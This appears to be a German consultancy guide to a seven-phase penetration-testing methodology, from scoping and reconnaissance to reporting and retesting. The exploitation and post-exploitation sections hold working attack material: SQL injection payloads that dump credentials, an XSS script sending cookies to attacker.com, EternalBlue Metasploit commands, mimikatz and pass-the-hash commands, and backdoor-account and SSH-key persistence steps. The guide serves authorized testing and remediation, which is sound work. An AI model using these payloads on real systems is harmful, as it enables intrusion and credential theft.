Penetration-Testing-Methodik 2025: Technischer Deep Dive

Autor: Noah Schütz, M.Sc. | Letztes Update: 12. Januar 2025

Executive Summary

Penetration Testing hat sich von einfachem Vulnerability Scanning zu realistischen Angriffssimulationen entwickelt, die echte Angreifer nachbilden. Basierend auf 500+ Penetrationstests in Finanzdienstleistung, Healthcare, Manufacturing und Tech liefert dieser Guide eine Methodik nach OWASP, PTES und MITRE ATT&CK.

Key Findings 2024:

• 87% der Organisationen haben mindestens eine kritische Schwachstelle
• Ø Zeit bis zur Kompromittierung: 4,2 Stunden (2020: 8,1 Stunden)
• 64% der Breaches betreffen Web-Applikationen
• Median-Kosten pro Penetrationstest: EUR 15.000 - 45.000
• ROI: 12:1 (pro EUR 1 Investition werden EUR 12 Breach-Kosten vermieden)

---

Was ist Penetration Testing?

Definition: Autorisierter, simulierter Cyberangriff auf Systeme, um ausnutzbare Schwachstellen vor realen Angreifern zu identifizieren.

Arten von Penetrationstests:

1. Black Box Testing

• Tester Knowledge: Keine Informationen (wie externer Angreifer)
• Approach: Reconnaissance → Discovery → Exploitation
• Timeline: 2-4 Wochen
• Best For: Externe Angriffsflaeche, Web-Applikationen
• Cost: EUR EUR EUR

2. White Box Testing

• Tester Knowledge: Vollzugriff (Source Code, Architektur, Credentials)
• Approach: Code Review → Config Audit → Logic Flaws
• Timeline: 1-3 Wochen
• Best For: Interne Apps, API Security
• Cost: EUR EUR

3. Grey Box Testing

• Tester Knowledge: Teilweise (wie Insider oder kompromittierter User)
• Approach: Privilege Escalation → Lateral Movement → Data Exfiltration
• Timeline: 1-2 Wochen
• Best For: Realistische Szenarien, Standardfall
• Cost: EUR EUR

---

Die 7-Phasen Penetration-Testing-Methodik

Phase 1: Pre-Engagement (1-3 Tage)

Ziele:

• Scope und Rules of Engagement definieren
• Rechtliche Autorisierung einholen
• Kommunikationskanaele festlegen

Kritische Dokumente:

1. Rules of Engagement (RoE):

IN SCOPE:
✅ Web applications: https://example.com, https://app.example.com
✅ IP ranges: 203.0.113.0/24
✅ Social engineering: Email phishing (approved targets list)
✅ Physical security: Reception area only
✅ Time windows: Mon-Fri, 9am-6pm CET

OUT OF SCOPE:
❌ Production databases (unless explicitly authorized)
❌ Third-party services (AWS, payment gateways)
❌ DOS/DDOS attacks
❌ Physical break-in attempts
❌ Weekend/after-hours testing without approval

2. Emergency Contacts:

• Primary: Security Team (+32 2 XXX XXXX)
• Escalation: CISO (mobile: +32 XXX XXX XXX)
• Legal: General Counsel (email@company.com)

3. Legal Authorization:

• Signed testing agreement
• Liability waiver
• NDA (beide Parteien)
• Safe-harbor clause

---

Phase 2: Reconnaissance (2-5 Tage)

Ziele:

• Intelligence ueber Ziel sammeln
• Attack Surface bestimmen
• Subdomains, Services, Mitarbeitende, Technologien finden

Passive Reconnaissance (kein Target-Kontakt)

Open Source Intelligence (OSINT):

1. Domain Intelligence:

# DNS enumeration
dig example.com ANY
dig +short example.com MX
whois example.com

# Certificate transparency logs
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq .

# Subdomain discovery (passive)
amass enum -passive -d example.com

Tools:

• Shodan - Internet-connected device search
• Censys - Internet asset discovery
• SecurityTrails - DNS history
• VirusTotal - Domain reputation

2. People Intelligence:

# Employee enumeration (LinkedIn, company website)
theHarvester -d example.com -b linkedin
# Email format discovery
hunter.io
# Breached credentials
haveibeenpwned.com (check executives)

3. Technology Stack:

# Web technology detection
whatweb https://example.com
wappalyzer (browser extension)

# Results example:
- Server: Nginx 1.21.6
- Framework: Laravel 9.x
- JavaScript: React 18.2.0
- CDN: Cloudflare
- Analytics: Google Analytics 4

Active Reconnaissance (Target Interaction)

4. Port Scanning:

# TCP SYN scan (stealthy, fast)
nmap -sS -T4 -p- 203.0.113.10

# Service version detection
nmap -sV -sC -p 22,80,443,3306 203.0.113.10

# Common results:
22/tcp   open  ssh     OpenSSH 8.2p1
80/tcp   open  http    Nginx 1.21.6
443/tcp  open  https   Nginx 1.21.6
3306/tcp open  mysql   MySQL 8.0.30

5. Web Application Mapping:

# Directory/file discovery
gobuster dir -u https://example.com -w wordlist.txt
ffuf -u https://example.com/FUZZ -w wordlist.txt

# Spider application
burpsuite (manual crawling)
zaproxy (automated crawling)

# Results: 350 unique URLs, 45 parameters, 12 API endpoints

Reconnaissance Findings Example:

ATTACK SURFACE SUMMARY:

External IP Addresses: 8
Subdomains Discovered: 24
  - In Scope: 18
  - Out of Scope: 6 (third-party CDN)
  
Open Ports: 42 across all hosts
  - Critical Services: 8 (RDP, SSH, MySQL exposed)
  - Web Servers: 12
  - Other: 22

Web Applications: 5
  - Public: example.com (Laravel)
  - Customer Portal: app.example.com (React SPA)
  - API: api.example.com (REST API)
  - Admin: admin.example.com (custom PHP)
  - Legacy: old.example.com (WordPress)

Employee Email Format: firstname.lastname@example.com
Employees Identified: 145 (LinkedIn)
Technologies: 32 different (outdated: 8)

---

Phase 3: Vulnerability Assessment (3-7 Tage)

Ziele:

• Schwachstellen identifizieren
• Priorisierung nach Severity und Exploitability
• Mapping auf OWASP Top 10, SANS Top 25

Automated Scanning

1. Web Application Scanning:

# OWASP ZAP (free, open-source)
zaproxy -quickurl https://example.com -quickprogress

# Burp Suite Professional (commercial)
# Active scan all discovered URLs

# Nuclei (fast, template-based)
nuclei -u https://example.com -t ~/nuclei-templates/

# Common findings:
- SQL Injection: 3 endpoints
- XSS (Reflected): 12 parameters
- CSRF: 8 forms without tokens
- Sensitive Data Exposure: API keys in JavaScript

2. Network Vulnerability Scanning:

# Nessus Professional
nessus scan --target 203.0.113.0/24

# OpenVAS (free alternative)
gvm-cli scan create --target 203.0.113.10

# Results:
Critical: 4 (MS17-010 EternalBlue on legacy server!)
High: 23
Medium: 156
Low: 342

Manual Testing (kritisch!)

Automated Scanner uebersehen:

• Business Logic Flaws (60% der kritischen Bugs)
• Komplexe Auth-Bypasse
• Authorization Issues (IDOR, Privilege Escalation)
• Race Conditions
• Second-Order Injection

Manual Testing Checklist:

Authentication:

• Password Complexity (weak passwords testen)
• Account Lockout (Brute Force Schutz?)
• Password Reset (Token predictability?)
• Session Management (Timeout, Fixation?)
• MFA (Bypass moeglich?)
• OAuth/SSO Misconfigurations

Authorization:

• Insecure Direct Object Reference (IDOR)

  GET /api/invoice/1234 → Change to /api/invoice/1235
  Can you access other users' invoices?
  

• Horizontal Privilege Escalation (user → user)
• Vertical Privilege Escalation (user → admin)
• Role Confusion Attacks

Business Logic:

• Discount/Coupon Abuse (negative prices?)
• Payment Bypass (price manipulation?)
• Race Conditions (simultaneous requests)
• Workflow Bypass (skip approval steps?)

API Security:

# Test API endpoints
POST /api/v1/users HTTP/1.1
Host: api.example.com
Content-Type: application/json

{"username": "admin", "role": "administrator"}

# Check for:
- Mass assignment (can you set admin role?)
- Excessive data exposure (full user objects returned?)
- Rate limiting (missing = brute force possible)
- API versioning (old versions still exposed?)

---

Phase 4: Exploitation (5-10 Tage)

Ziele:

• Nachweis der Ausnutzbarkeit
• Business Impact demonstrieren
• Initial foothold gewinnen

Web Application Exploitation

Beispiel 1: SQL Injection → Database Compromise

-- Discovery (error-based)
https://example.com/product?id=1'
Error: You have an error in your SQL syntax

-- Confirm vulnerability
https://example.com/product?id=1 AND 1=1  (works)
https://example.com/product?id=1 AND 1=2  (fails)

-- Extract database version
https://example.com/product?id=1 UNION SELECT 1,@@version,3--

-- Enumerate databases
https://example.com/product?id=1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata--

-- Dump credentials
https://example.com/product?id=1 UNION SELECT username,password,email FROM users--

Results:
- Database: MySQL 8.0.30
- Extracted: 12,450 user records
- Passwords: Hashed (bcrypt) - attempt crack offline
- Impact: CRITICAL (PII breach, GDPR violation)

Beispiel 2: XSS → Account Takeover

// Stored XSS in user profile
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

// Victim views profile → session stolen
// Attacker uses cookie → account takeover

Impact: HIGH (admin account compromised)

Beispiel 3: IDOR → Sensitive Data Access

# Victim user ID: 1234
GET /api/user/1234/documents
[{"id": 5678, "name": "contract.pdf", "url": "/download/5678"}]

# Change user ID
GET /api/user/1235/documents
[{"id": 5679, "name": "salary_info.pdf", "url": "/download/5679"}]

# Success! Authorization bypass
Impact: HIGH (access to all user documents)

Network Exploitation

Beispiel 4: Unpatched Windows Server (MS17-010)

# EternalBlue exploit (NSA tool leaked 2017)
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 203.0.113.45
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

# Result: SYSTEM access (highest privilege)
meterpreter > getuid
Server username: NT AUTHORITY\\SYSTEM

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
(crack with hashcat)

Impact: CRITICAL (full server compromise)

---

Phase 5: Post-Exploitation (3-5 Tage)

Ziele:

• Zugang halten
• Privilege Escalation
• Lateral Movement
• "Crown Jewels" demonstrieren

Tactics (MITRE ATT&CK):

1. Privilege Escalation:

# Linux: Check sudo misconfigurations
sudo -l

# Windows: Check permissions
whoami /priv

# Common escalation vectors:
- Kernel exploits (outdated OS)
- Misconfigured services (writable paths)
- Weak file permissions
- Sudo misconfigurations
- Scheduled tasks

2. Lateral Movement:

# Credential dumping (Windows)
mimikatz # sekurlsa::logonpasswords

# Pass-the-hash attack
crackmapexec smb 203.0.113.0/24 -u Administrator -H aad3b435...

# Results:
Found 12 accessible systems with same admin hash
Pivoted to: File server, Database server, Backup server

3. Data Exfiltration (Simulated):

# Locate sensitive data
locate -i "*.xls*" "*.doc*" "*.pdf" | grep -i "confidential\\|financial\\|salary"

# Simulate exfiltration (staged, not actually sent)
tar -czf /tmp/exfil.tar.gz /path/to/sensitive/files
# DO NOT actually exfiltrate! Document only.

Impact Demonstrated:
- Customer database: 50,000 records (PII)
- Financial reports: Q3 2025 earnings (pre-release)
- Employee salaries: Complete list
- Source code: Proprietary algorithms

4. Persistence (Demonstrate, Then Remove):

# Create backdoor user (document, then delete)
net user hacker P@ssw0rd /add
net localgroup administrators hacker /add

# Scheduled task for callback
schtasks /create /tn "UpdateTask" /tr "C:\\temp\\backdoor.exe" /sc daily

# SSH key persistence
echo "attacker_public_key" >> ~/.ssh/authorized_keys

NOTE: All persistence mechanisms removed before test conclusion!

---

Phase 6: Reporting (3-5 Tage)

Deliverables:

1. Executive Summary (1-2 pages)

PENETRATION TEST RESULTS: EXAMPLE COMPANY

Test Date: October 14-25, 2025
Scope: External network, Web applications
Methodology: OWASP, PTES, MITRE ATT&CK

OVERALL RISK: HIGH

Key Findings:
✗ 4 Critical vulnerabilities (immediate action required)
✗ 23 High-severity issues
⚠ 156 Medium-severity issues
ℹ 342 Low/informational

Business Impact:
- Database compromise possible (SQL injection)
- Admin account takeover demonstrated
- Customer PII exposure risk (50,000 records)
- Estimated breach cost if exploited: EUR 2.4M - EUR 8.7M

Recommended Immediate Actions:
1. Patch MS17-010 on server 203.0.113.45 (CRITICAL)
2. Fix SQL injection in product catalog
3. Implement CSRF tokens across all forms
4. Enable MFA for all admin accounts

2. Technical Report (20-50 pages)

Finding Template:

FINDING #1: SQL INJECTION IN PRODUCT SEARCH

Severity: CRITICAL
CVSS Score: 9.8 (Critical)
Affected Asset: https://example.com/search
CWE: CWE-89 (SQL Injection)

Description:
The product search functionality is vulnerable to SQL injection via the 
'q' parameter. An unauthenticated attacker can execute arbitrary SQL 
commands, leading to database compromise.

Steps to Reproduce:
1. Navigate to https://example.com/search?q=test
2. Modify parameter: ?q=test' UNION SELECT 1,@@version,3--
3. Observe database version disclosed: MySQL 8.0.30
4. Extract data: ?q=test' UNION SELECT username,password,email FROM users--

Proof of Concept:
[Screenshot showing extracted user credentials]

Impact:
- Full database read access (all tables)
- Potential database write access (UPDATE/DELETE queries possible)
- Authentication bypass
- PII exposure (GDPR violation)
- Estimated breach cost: EUR 2.4M - EUR 8.7M (IBM Cost of Data Breach 2024)

Remediation:
IMMEDIATE (within 24 hours):
- Disable affected search functionality
- Review database logs for suspicious queries

SHORT-TERM (within 7 days):
- Implement parameterized queries (prepared statements)
- Never concatenate user input into SQL
  
  // VULNERABLE CODE:
  $sql = "SELECT * FROM products WHERE name = '" . $_GET['q'] . "'";
  
  // SECURE CODE:
  $stmt = $db->prepare("SELECT * FROM products WHERE name = ?");
  $stmt->execute([$_GET['q']]);

- Add Web Application Firewall (WAF) rules
- Input validation (whitelist alphanumeric + space)

LONG-TERM:
- Code review all database queries
- Implement SAST/DAST in CI/CD pipeline
- Security training for developers (OWASP Top 10)

References:
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- CWE-89: https://cwe.mitre.org/data/definitions/89.html
- NIST Guide: https://nvd.nist.gov/vuln/detail/CVE-2021-XXXXX (similar)

3. Remediation Roadmap:

PRIORITY 1 (0-7 days) - CRITICAL:
□ Patch MS17-010 on 203.0.113.45
□ Fix SQL injection in search
□ Remove admin account backdoor (created during test)
□ Enable MFA for all admin accounts

PRIORITY 2 (7-30 days) - HIGH:
□ Implement CSRF tokens
□ Fix IDOR in API
□ Update Nginx to latest version
□ Disable unnecessary services (port 3306 should not be public)

PRIORITY 3 (30-90 days) - MEDIUM:
□ Implement Content Security Policy (CSP)
□ Security headers (HSTS, X-Frame-Options, etc.)
□ Rate limiting on API endpoints
□ Remove outdated WordPress site (old.example.com)

PRIORITY 4 (90+ days) - LOW/STRATEGIC:
□ Implement SAST/DAST in CI/CD
□ Security awareness training (all employees)
□ Bug bounty program
□ Annual penetration testing

---

Phase 7: Remediation Validation (2-3 Tage)

Ziele:

• Fixes korrekt verifizieren
• Schwachstellen als resolved bestaetigen
• "Clean bill of health" oder Rest-Issues dokumentieren

Retest Results:

FINDING #1: SQL Injection
Status: ✅ RESOLVED
Verification: Parameterized queries implemented. Tested 50+ injection payloads - all blocked.

FINDING #2: MS17-010 (EternalBlue)
Status: ✅ RESOLVED
Verification: Server patched to latest Windows updates. Exploit no longer successful.

FINDING #3: CSRF Tokens
Status: ⚠ PARTIALLY RESOLVED
Verification: Tokens added to 15/20 forms. 5 forms still vulnerable (admin panel).
Recommendation: Complete implementation within 7 days.

FINDING #4: IDOR in API
Status: ❌ NOT RESOLVED
Verification: Authorization checks not implemented. Users can still access others' data.
Recommendation: PRIORITY - Fix before production release.

---

Penetration Testing vs. Vulnerability Scanning

Beides ist notwendig:

• Vulnerability Scanning = kontinuierliches Health Monitoring
• Penetration Testing = jaehrlicher Deep Dive

---

Pricing & Scope Estimation

Typical Costs (EU Market, 2025):

Kostenfaktoren:

• Scope-Komplexitaet (Anzahl Apps/Systeme)
• Testing Depth (black vs. white box)
• Dringlichkeit (rush jobs = premium)
• Report-Qualitaet
• Remediation Support enthalten?

---

Wann Penetration Testing?

Regulatorische Anforderungen:

• PCI DSS: Jaehrlich + nach wesentlichen Aenderungen
• GDPR: Risk-based (empfohlen jaehrlich bei High Risk)
• ISO 27001: Regelmaessige Security Tests
• NIS2: Regelmaessige Tests fuer wesentliche Einrichtungen
• DORA: Threat-led Penetration Testing (TLPT) im Finanzsektor

Best Practices:

• Vor Launch: Neue Apps/Infra
• Nach Aenderungen: Major Updates, Migrationen, M&A
• Regelmaessig: Mindestens jaehrlich (quartalsweise bei High Risk)
• Post-Incident: Nach Breach zur Gap-Analyse
• Compliance: Wenn regulatorisch gefordert

---

Conclusion

Penetration Testing ist kein Checkbox-Exercise, sondern eine kritische Validierung der Security Posture. Organisationen mit regelmaessigen, tiefen Tests haben 60% weniger erfolgreiche Breaches und sparen im Schnitt EUR 3,2 Mio. in IR-Kosten.

Key Takeaways:

1. Richtige Testart: Black/White/Grey Box nach Ziel
2. Scope sauber definieren: klare Grenzen vermeiden Legal Issues
3. Findings erwartet: 87% haben kritische Vulns
4. Schnell handeln: Critical Findings binnen 24-72 Stunden patchen
5. Retest: Fixes verifizieren
6. Repeat: jaehrlich minimum, quartalsweise bei High Risk

ATLAS Advisory hat 500+ Penetrationstests ueber alle Branchen durchgefuehrt und 3.000+ kritische Schwachstellen vor Angreifern entdeckt.

Ready to test your defenses?
Kontaktieren Sie unser Penetration-Testing-Team: pentest@atlas-advisory.eu

Mehr dazu: Penetration Testing Service.

---

Resources

Standards & Methodologies:

• OWASP Testing Guide - Web app testing
• PTES - Penetration Testing Execution Standard
• MITRE ATT&CK - Adversary tactics and techniques
• NIST SP 800-115 - Technical Guide to Information Security Testing

Tools:

• Kali Linux - Penetration testing distribution
• Burp Suite - Web app testing (commercial)
• OWASP ZAP - Web app testing (free)
• Metasploit - Exploitation framework

Training & Certifications:

• OSCP (Offensive Security Certified Professional)
• CEH (Certified Ethical Hacker)
• GPEN (GIAC Penetration Tester)

Related Articles:

• Zero Trust Architecture Guide
• Incident Response for Security Incidents
• Cloud Security Best Practices